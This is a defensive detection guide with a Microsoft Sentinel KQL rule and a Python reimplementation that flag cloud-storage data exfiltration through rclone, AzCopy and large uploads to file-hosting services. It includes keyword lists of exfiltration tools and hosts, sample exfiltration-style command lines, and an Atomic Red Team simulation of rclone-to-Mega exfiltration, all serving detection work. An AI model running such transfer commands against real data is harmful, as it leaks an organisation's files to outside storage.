Detect Data Exfiltration via Cloud Storage Services in Microsoft Sentinel
Exfiltration of corporate data to attacker-controlled cloud storage is a dominant technique in double-extortion ransomware campaigns and espionage operations. Adversaries upload to legitimate cloud storage services (Mega, Dropbox, OneDrive, Box, Google Drive, ShareFile) using legitimate transfer tools (rclone, AzCopy) so that exfiltration traffic blends with normal business activity and bypasses egress controls that only block unknown C2 IPs. Scattered Spider used Mega for SMB data exfiltration before ransomware deployment in 2024-2025. Akira and Black Basta affiliates use rclone with SFTP and cloud backends. Lazarus Group favors Dropbox and Google Drive. Key indicators: rclone.exe or azcopy.exe execution against external cloud endpoints, large outbound transfers to cloud storage IPs, WinSCP or FileZilla used for bulk data staging, and PowerShell Invoke-WebRequest with cloud storage URLs. Detection opportunities exist in both the staging phase (file collection before transfer) and the transfer phase (network and process telemetry).
MITRE ATT&CK
- Tactic: Exfiltration
KQL Detection Query
// THREAT: Data Exfiltration via Cloud Storage
// Detects use of rclone, AzCopy, and cloud storage APIs for data exfiltration
// Alert 1: rclone execution (major exfiltration tool for ransomware groups)
let RcloneIndicators = DeviceProcessEvents
    | where Timestamp > ago(24h)
    | where FileName =~ "rclone.exe"
        or ProcessCommandLine has_any ("rclone", "rclone.exe")
    | project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
        InitiatingProcessFileName, FolderPath
    | extend ThreatType = "Exfil_Rclone"
    | extend RiskScore = 85;
// Alert 2: AzCopy with external Azure storage accounts
let AzCopyExternal = DeviceProcessEvents
    | where Timestamp > ago(24h)
    | where FileName =~ "azcopy.exe" or FileName =~ "azcopy"
    | where ProcessCommandLine has_any (
        "blob.core.windows.net", "file.core.windows.net",
        "queue.core.windows.net"
    )
    // Exclude known corporate storage accounts
    | where ProcessCommandLine !has "<YOUR_CORPORATE_STORAGE_ACCOUNT>"
    | project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine
    | extend ThreatType = "Exfil_AzCopy_External"
    | extend RiskScore = 80;
// Alert 3: Large data upload to cloud storage (network telemetry)
// Bound to a let statement so it can be unioned with the two process-based vectors
// instead of standing alone as a second tabular statement
let LargeCloudUpload = DeviceNetworkEvents
    | where Timestamp > ago(24h)
    | where ActionType =~ "ConnectionSuccess"
    | where RemoteUrl has_any (
        "mega.nz", "mega.io", "mega.co.nz",  // mega.co.nz hosts the API endpoint seen in Test 1
        "dropbox.com", "dropboxapi.com",
        "box.com", "box.net",
        "onedrive.live.com", "1drv.ms",
        "sharefile.com", "drive.google.com",
        "sendspace.com", "filebin.net",
        "transfer.sh", "gofile.io", "anonfiles.com"
    ) or RemoteUrl matches regex @"[a-z0-9]{5,}\.blob\.core\.windows\.net"
    // Byte counts require a connector that populates SentBytes; confirm the column exists in your workspace
    // DeviceNetworkEvents carries the user as InitiatingProcessAccountName; alias it so the union lines up
    | summarize
        Connections = count(),
        BytesSent = sum(SentBytes),
        Domains = make_set(RemoteUrl)
        by DeviceName, AccountName = InitiatingProcessAccountName, InitiatingProcessFileName, bin(Timestamp, 1h)
    | where BytesSent > 100000000 // 100MB threshold
    | extend ThreatType = "Exfil_LargeCloudUpload"
    | extend RiskScore = 70;
// Combine all three vectors and rank by risk
union RcloneIndicators, AzCopyExternal, LargeCloudUpload
| sort by RiskScore desc, Timestamp desc

Three-vector cloud exfiltration detection: (1) rclone.exe execution, the primary exfiltration tool documented in Akira, Black Basta, and Scattered Spider campaigns; (2) AzCopy with external Azure storage account URLs, since attackers stage data in attacker-controlled Azure Blob storage; (3) large data uploads (>100MB/hour) to known file hosting and consumer cloud storage services. All three are SMB-relevant double-extortion indicators.
Data Sources
Required Tables
- DeviceProcessEvents (Alerts 1 and 2: rclone and AzCopy process telemetry)
- DeviceNetworkEvents (Alert 3: connections and bytes sent to cloud storage hosts)
False Positives & Tuning
- Legitimate rclone use by system administrators for cloud backup operations (should be documented and excluded by account name)
- Corporate AzCopy scripts synchronising data with legitimate company Azure storage accounts
- Users with business accounts for Dropbox or Box uploading work files (OneDrive and Box are commonly used for business)
- Large legitimate data transfers to authorised cloud archival storage
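The three vectors described under the query and the account-based exclusions from the tuning list above, as an added Python example that is not part of the Sentinel rule or this page: it runs the same logic over constructed rows shaped like DeviceProcessEvents and DeviceNetworkEvents. The corporate storage account name, the approved backup account, the hosts and every sample row are assumptions; substring matching stands in for KQL's token-based `has_any`.

```python
"""Added example: the rule's three detection vectors plus account-based tuning,
run over constructed telemetry shaped like DeviceProcessEvents/DeviceNetworkEvents
rows. Not part of the Sentinel rule; all accounts, hosts and rows are assumptions."""
import re
from collections import defaultdict
from datetime import datetime

CLOUD_STORAGE_DOMAINS = (
    "mega.nz", "mega.io", "mega.co.nz", "dropbox.com", "dropboxapi.com",
    "box.com", "box.net", "onedrive.live.com", "1drv.ms", "sharefile.com",
    "drive.google.com", "sendspace.com", "filebin.net", "transfer.sh",
    "gofile.io", "anonfiles.com",
)
AZURE_STORAGE_SUFFIXES = ("blob.core.windows.net", "file.core.windows.net", "queue.core.windows.net")
BLOB_HOST_RE = re.compile(r"[a-z0-9]{5,}\.blob\.core\.windows\.net")
UPLOAD_THRESHOLD_BYTES = 100_000_000  # 100 MB per device/account/process/hour, as in the KQL

# Tuning inputs (assumed placeholder values, see "False Positives & Tuning")
CORPORATE_STORAGE_ACCOUNTS = {"contosobackup"}  # assumed company-owned Azure storage account
APPROVED_RCLONE_ACCOUNTS = {"svc_backup"}       # assumed documented admin backup account


def rclone_alerts(process_events, approved=APPROVED_RCLONE_ACCOUNTS):
    """Alert 1: rclone execution, excluding documented backup accounts."""
    out = []
    for ev in process_events:
        if ev["FileName"].lower() == "rclone.exe" or "rclone" in ev["ProcessCommandLine"].lower():
            if ev["AccountName"].lower() in approved:
                continue
            out.append({**ev, "ThreatType": "Exfil_Rclone", "RiskScore": 85})
    return out


def azcopy_external_alerts(process_events, corporate=CORPORATE_STORAGE_ACCOUNTS):
    """Alert 2: AzCopy pointed at an Azure storage endpoint that is not a known corporate account."""
    out = []
    for ev in process_events:
        cmd = ev["ProcessCommandLine"].lower()
        if ev["FileName"].lower() not in ("azcopy.exe", "azcopy"):
            continue
        if not any(s in cmd for s in AZURE_STORAGE_SUFFIXES) or any(a in cmd for a in corporate):
            continue
        out.append({**ev, "ThreatType": "Exfil_AzCopy_External", "RiskScore": 80})
    return out


def is_cloud_storage_url(url):
    """RemoteUrl has_any (...) or RemoteUrl matches the random-looking blob host regex."""
    url = url.lower()
    return any(d in url for d in CLOUD_STORAGE_DOMAINS) or BLOB_HOST_RE.search(url) is not None


def large_upload_alerts(network_events, threshold=UPLOAD_THRESHOLD_BYTES):
    """Alert 3: sum SentBytes per device/account/process/hour and flag buckets over the threshold."""
    buckets = defaultdict(lambda: {"Connections": 0, "BytesSent": 0, "Domains": set()})
    for ev in network_events:
        if ev["ActionType"].lower() != "connectionsuccess" or not is_cloud_storage_url(ev["RemoteUrl"]):
            continue
        hour = datetime.fromisoformat(ev["Timestamp"]).replace(minute=0, second=0, microsecond=0)  # bin(.., 1h)
        b = buckets[(ev["DeviceName"], ev["AccountName"], ev["InitiatingProcessFileName"], hour)]
        b["Connections"] += 1
        b["BytesSent"] += ev["SentBytes"]
        b["Domains"].add(ev["RemoteUrl"])
    return [{"Timestamp": hour.isoformat(), "DeviceName": dev, "AccountName": acct,
             "InitiatingProcessFileName": proc, **b, "ThreatType": "Exfil_LargeCloudUpload", "RiskScore": 70}
            for (dev, acct, proc, hour), b in buckets.items() if b["BytesSent"] > threshold]


def run_detection(process_events, network_events):
    """union RcloneIndicators, AzCopyExternal, LargeCloudUpload | sort by RiskScore desc, Timestamp desc"""
    alerts = rclone_alerts(process_events) + azcopy_external_alerts(process_events) + large_upload_alerts(network_events)
    return sorted(alerts, key=lambda a: (a["RiskScore"], a["Timestamp"]), reverse=True)


# Constructed sample telemetry (not real data): one exfil-like user, one documented backup account.
SAMPLE_PROCESS_EVENTS = [
    {"Timestamp": "2025-01-15T14:02:00", "DeviceName": "DESKTOP-01", "AccountName": "jdoe", "FileName": "rclone.exe",
     "ProcessCommandLine": r"rclone.exe copy C:\Finance mega:share --transfers 8", "InitiatingProcessFileName": "cmd.exe"},
    {"Timestamp": "2025-01-15T01:00:00", "DeviceName": "SRV-BACKUP", "AccountName": "svc_backup", "FileName": "rclone.exe",
     "ProcessCommandLine": r"rclone.exe sync D:\Backups corp-s3:nightly", "InitiatingProcessFileName": "schtasks.exe"},
    {"Timestamp": "2025-01-15T14:20:00", "DeviceName": "DESKTOP-01", "AccountName": "jdoe", "FileName": "azcopy.exe",
     "ProcessCommandLine": r"azcopy copy C:\HR https://xk3p9q7z1a.blob.core.windows.net/data --recursive", "InitiatingProcessFileName": "cmd.exe"},
    {"Timestamp": "2025-01-15T02:00:00", "DeviceName": "SRV-BACKUP", "AccountName": "svc_backup", "FileName": "azcopy.exe",
     "ProcessCommandLine": r"azcopy sync D:\Backups https://contosobackup.blob.core.windows.net/nightly", "InitiatingProcessFileName": "schtasks.exe"},
]
SAMPLE_NETWORK_EVENTS = [
    {"Timestamp": "2025-01-15T14:05:00", "DeviceName": "DESKTOP-01", "AccountName": "jdoe", "InitiatingProcessFileName": "rclone.exe",
     "ActionType": "ConnectionSuccess", "RemoteUrl": "g.api.mega.co.nz", "SentBytes": 60_000_000},
    {"Timestamp": "2025-01-15T14:41:00", "DeviceName": "DESKTOP-01", "AccountName": "jdoe", "InitiatingProcessFileName": "rclone.exe",
     "ActionType": "ConnectionSuccess", "RemoteUrl": "mega.nz", "SentBytes": 55_000_000},   # same hour: 115 MB total
    {"Timestamp": "2025-01-15T15:10:00", "DeviceName": "DESKTOP-01", "AccountName": "jdoe", "InitiatingProcessFileName": "rclone.exe",
     "ActionType": "ConnectionSuccess", "RemoteUrl": "mega.nz", "SentBytes": 30_000_000},   # next hour, under threshold
    {"Timestamp": "2025-01-15T10:12:00", "DeviceName": "DESKTOP-02", "AccountName": "asmith", "InitiatingProcessFileName": "OneDrive.exe",
     "ActionType": "ConnectionSuccess", "RemoteUrl": "onedrive.live.com", "SentBytes": 20_000_000},  # normal business sync
]

if __name__ == "__main__":
    for a in run_detection(SAMPLE_PROCESS_EVENTS, SAMPLE_NETWORK_EVENTS):
        print(a["RiskScore"], a["ThreatType"], a["DeviceName"], a["AccountName"])
```

Running it yields three alerts ordered 85, 80, 70: the rclone run by `jdoe`, the AzCopy copy to the unknown blob account, and the 115 MB hourly bucket from `rclone.exe`. The backup account's rclone and AzCopy activity and the OneDrive sync under the threshold produce nothing, which is the effect the tuning list above asks for; the hourly binning also shows why a slow transfer spread across hours stays below the 100 MB threshold and may need a longer bin or a daily roll-up in your environment.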
Testing Methodology
Validate this detection against one adversary technique from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see.
- Test 1: Simulate Cloud Exfiltration via rclone to Mega
Expected signal: Sysmon Event ID 1: rclone.exe with copy command targeting a mega remote. Sysmon Event ID 3: network connection to mega.co.nz or api.mega.co.nz.